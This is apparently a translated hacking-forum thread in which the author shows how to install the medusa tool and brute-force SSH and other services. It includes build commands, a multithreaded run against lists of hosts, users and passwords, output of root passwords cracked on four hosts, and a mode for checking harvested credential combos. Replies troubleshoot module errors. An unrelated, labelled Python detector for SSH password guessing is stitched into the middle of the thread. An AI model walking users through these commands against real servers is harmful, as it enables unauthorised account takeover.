Posts about how to brute-force SSH, as well as other daemons, come up fairly often. When it comes to SSH brute forcing, everyone insists on hydra: it's the best, the very best. But that is not so. After two hours of brute forcing on several threads it would blatantly crash with a core dump on me; only restarting helped, and in terms of speed its results were not particularly good. But there is another brute-forcer, medusa, which also supports a huge number of modules for various services. Here is the list of what it supports:

Code:
AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC

On top of that, there is also RDP in combination with rdesktop. The latest version can be downloaded from the developers' site, www.foofus.net. Brute forcing SSH requires the same library as hydra: libssh2. First download and install the library

Code:
wget -O libssh2-1.1.tar.gz "http://downloads.sourceforge.net/project/libssh2/libssh2/1.1/libssh2-1.1.tar.gz?use_mirror=sunet"

And install it

Code:
tar -zxvf libssh2-1.1.tar.gz
cd libssh2-1.1
./configure && make && make install

Download medusa

Code:
wget http://www.foofus.net/jmk/tools/medusa-1.5.tar.gz
tar -zxvf medusa-1.5.tar.gz
cd medusa-1.5
./configure

If the library installed properly, then after configuration

PHP:
configure: Medusa Module Build Summary
configure:
configure: AFP ** Disabled **
configure: CVS Enabled
configure: FTP Enabled
configure: HTTP Enabled
configure: IMAP Enabled
configure: MSSQL Enabled
configure: MYSQL Enabled
configure: NCP ** Disabled **
configure: NNTP Enabled
configure: PCANYWHERE Enabled
configure: POP3 Enabled
configure: POSTGRES ** Disabled **
configure: REXEC Enabled
configure: RLOGIN Enabled
configure: RSH Enabled
configure: SMBNT Enabled
configure: SMTP Enabled
configure: SMTP-VRFY Enabled
configure: SNMP Enabled
configure: SSH Enabled
configure: SVN ** Disabled **
configure: TELNET Enabled
configure: VMAUTHD Enabled
configure: VNC Enabled
configure: WRAPPER Enabled
configure: WEB-FORM Enabled

SSH will be enabled; compile and install right away.

Code:
make && make install

And check how the modules for medusa installed

Code:
medusa -d
+ cvs.mod : Brute force module for CVS sessions : version 1.0.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
+ http.mod : Brute force module for HTTP : version 1.3.0
+ imap.mod : Brute force module for IMAP sessions : version 1.2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
+ mysql.mod : Brute force module for MySQL sessions : version 1.2
+ nntp.mod : Brute force module for NNTP sessions : version 1.0.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
+ pop3.mod : Brute force module for POP3 sessions : version 1.2
+ rexec.mod : Brute force module for REXEC sessions : version 1.1.1
+ rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
+ rsh.mod : Brute force module for RSH sessions : version 1.0.1
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
+ telnet.mod : Brute force module for telnet sessions : version 1.2.2
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
+ vnc.mod : Brute force module for VNC sessions : version 1.0.1
+ web-form.mod : Brute force module for web forms : version 1.0.0
+ wrapper.mod : Generic Wrapper Module : version 1.0.1

Run it with 3 threads

Code:
medusa -T 3 -H hosts.txt -U users.txt -P password.txt -O good.txt -M ssh

PHP:
ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 1 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.92 (1 of 6, 1 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.92 (1 of 6, 1 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.0.92 User: root Password: superpass [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 172.16.0.3 (2 of 6, 2 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.3 (2 of 6, 2 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.0.3 User: root Password: superpass[SUCCESS]
CRITICAL: Failed to resolve hostname: 172.16.0.8172.16.0.92
ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 4 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 4 complete) User: root (1 of 1, 1 complete) Password: wew33w@ (3 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.8 (6 of 6, 4 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.8 (6 of 6, 4 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.0.8 User: root Password: superpass[SUCCESS]
ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 5 complete) User: root (1 of 1, 1 complete) Password: support (4 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.18 (4 of 6, 5 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.0.18 (4 of 6, 5 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.0.18 User: root Password: superpass [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 6 complete) User: root (1 of 1, 1 complete) Password: mail (5 of 5 complete)

And look at the log file

Code:
cat good.txt

PHP:
[root@localhost brr]# cat good
# Medusa v.1.5 (2009-07-24 19:56:33)
# /usr/local/bin/medusa -T 3 -H hosts -U users -P password -O good -M ssh
ACCOUNT FOUND: [ssh] Host: 172.16.0.92 User: root Password: superpass [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 172.16.0.3 User: root Password: superpass[SUCCESS]
ACCOUNT FOUND: [ssh] Host: 172.16.0.8 User: root Password: superpass[SUCCESS]
ACCOUNT FOUND: [ssh] Host: 172.16.0.18 User: root Password: superpass [SUCCESS]
# Medusa has finished (2009-07-24 19:56:42).

It doesn't stop at SSH brute forcing; it can also brute-force FTP and RDP (IMHO that wasn't particularly pleasing: there are a lot of misses because the patch for rdesktop does not support system responses in languages other than English). As it turned out (I hadn't noticed), it also checks accounts without problems; that is, whichever modules are enabled, those are the ones it checks, including FTP, SSH, mail and so on. But the entry format is different. Create a file with the contents

Code:
172.16.0.3:root:superpass

The file format can also be like this

Code:
host:username:password
host:username:
host::
:username:password
:username:
::password
host::password

And run medusa as a checker

Code:
medusa -M ssh -C hosts
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>
ACCOUNT CHECK: [ssh] Host: 172.16.0.3 (1 of 1, 1 complete) User: root (1 of 1, 1 complete) Password: superpass (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.0.3 User: root Password: superpass [SUCCESS]

It will check the remaining accounts in exactly the same way; if you also specify a log file to save to, all the good accounts will be collected there.

(C) n0klos
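Added example, not part of the thread's posts: how the run shown above (a few rapid password guesses against root, then a hit) looks from the server side, and a detector for it. The log lines are constructed in OpenSSH's standard syslog wording; the source address 172.16.0.50, the host name `srv`, the thresholds and the function name `detect_guessing` are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in OpenSSH's syslog format (not taken from the thread).
SAMPLE_LOG = """\
Jul 24 19:56:33 srv sshd[4101]: Failed password for root from 172.16.0.50 port 40112 ssh2
Jul 24 19:56:34 srv sshd[4102]: Failed password for root from 172.16.0.50 port 40113 ssh2
Jul 24 19:56:34 srv sshd[4103]: Failed password for root from 172.16.0.50 port 40114 ssh2
Jul 24 19:56:36 srv sshd[4104]: Accepted password for root from 172.16.0.50 port 40115 ssh2
Jul 24 20:10:02 srv sshd[4200]: Failed password for alice from 172.16.0.77 port 51000 ssh2
Jul 24 20:31:40 srv sshd[4260]: Accepted password for alice from 172.16.0.77 port 51044 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect_guessing(log_text, threshold=3, window=timedelta(seconds=60), year=2009):
    """Return alerts for sources with >= threshold failures inside the window,
    marking those where a successful password login follows the burst."""
    failures = defaultdict(list)   # ip -> timestamps of recent failures
    alerts = {}                    # ip -> alert dict
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; the caller supplies it
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        # keep only failures still inside the sliding window
        recent = [t for t in failures[ip] if ts - t <= window]
        if m["result"] == "Failed":
            recent.append(ts)
            if len(recent) >= threshold:
                alerts.setdefault(ip, {"ip": ip, "failures": 0, "compromised_user": None})
                alerts[ip]["failures"] = max(alerts[ip]["failures"], len(recent))
        elif ip in alerts and recent:
            # success right after a burst of failures: treat as a guessed password
            alerts[ip]["compromised_user"] = m["user"]
        failures[ip] = recent
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_LOG):
        print(alert)
```

An alert with `compromised_user` set is the case to escalate: the account's password should be rotated on every host that shares it, since the thread's run found the same root password on four machines.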
I searched for an SSH brute-forcer; Google returned this in the top 10. Tried it. 1 thread. SSH brute force in progress) Later I'll try FTP.
Can anyone tell me what this error is?

medusa -d
Available modules in "." :
Available modules in "/usr/local/lib/medusa/modules" :
+ cvs.mod : Couldn't load "/usr/local/lib/medusa/modules/cvs.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ ftp.mod : Couldn't load "/usr/local/lib/medusa/modules/ftp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ http.mod : Couldn't load "/usr/local/lib/medusa/modules/http.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ imap.mod : Couldn't load "/usr/local/lib/medusa/modules/imap.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ mssql.mod : Couldn't load "/usr/local/lib/medusa/modules/mssql.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ mysql.mod : Couldn't load "/usr/local/lib/medusa/modules/mysql.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ nntp.mod : Couldn't load "/usr/local/lib/medusa/modules/nntp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ pcanywhere.mod : Couldn't load "/usr/local/lib/medusa/modules/pcanywhere.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ pop3.mod : Couldn't load "/usr/local/lib/medusa/modules/pop3.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ rexec.mod : Couldn't load "/usr/local/lib/medusa/modules/rexec.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ rlogin.mod : Couldn't load "/usr/local/lib/medusa/modules/rlogin.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ rsh.mod : Couldn't load "/usr/local/lib/medusa/modules/rsh.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ smbnt.mod : Couldn't load "/usr/local/lib/medusa/modules/smbnt.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ smtp-vrfy.mod : Couldn't load "/usr/local/lib/medusa/modules/smtp-vrfy.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ smtp.mod : Couldn't load "/usr/local/lib/medusa/modules/smtp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ snmp.mod : Couldn't load "/usr/local/lib/medusa/modules/snmp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ ssh.mod : Couldn't load "/usr/local/lib/medusa/modules/ssh.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ telnet.mod : Couldn't load "/usr/local/lib/medusa/modules/telnet.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ vmauthd.mod : Couldn't load "/usr/local/lib/medusa/modules/vmauthd.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ vnc.mod : Couldn't load "/usr/local/lib/medusa/modules/vnc.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ web-form.mod : Couldn't load "/usr/local/lib/medusa/modules/web-form.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ wrapper.mod : Couldn't load "/usr/local/lib/medusa/modules/wrapper.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
Just tried medusa... and the parallelization there isn't done very well, for example:
1. You can brute-force several logins at once
2. You can brute-force several hosts at once
But brute forcing one host and one login in several threads is NOT possible :/
Hm, strangely enough, everything works! And it is easier to install with a simple sudo apt-get command: all the libs get installed and it is ready to work right away!
medusa -d

Code:
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>
Available modules in "." :
Available modules in "/usr/local/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0
+ http.mod : Brute force module for HTTP : version 2.0
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.0
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.0
+ web-form.mod : Brute force module for web forms : version 2.0
+ wrapper.mod : Generic Wrapper Module : version 2.0

Everything seems OK here, but if I run something like

medusa -T 3 -H host.txt -U users.txt -P password.txt -O good.txt -M ssh

I see an error

Code:
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>
IMPORTANT: Couldn't load "ssh" [/usr/local/lib/medusa/modules/ssh.mod: cannot open shared object file: No such file or directory]. Place the module in the medusa directory, set the MEDUSA_MODULE_NAME environment variable or run the configure script again using --with-default-mod-path=[path].
IMPORTANT: Couldn't load "ssh" [/usr/local/lib/medusa/modules/ssh.mod: cannot open shared object file: No such file or directory]. Place the module in the medusa directory, set the MEDUSA_MODULE_NAME environment variable or run the configure script again using --with-default-mod-path=[path].
invokeModule failed - see previous errors for an explanation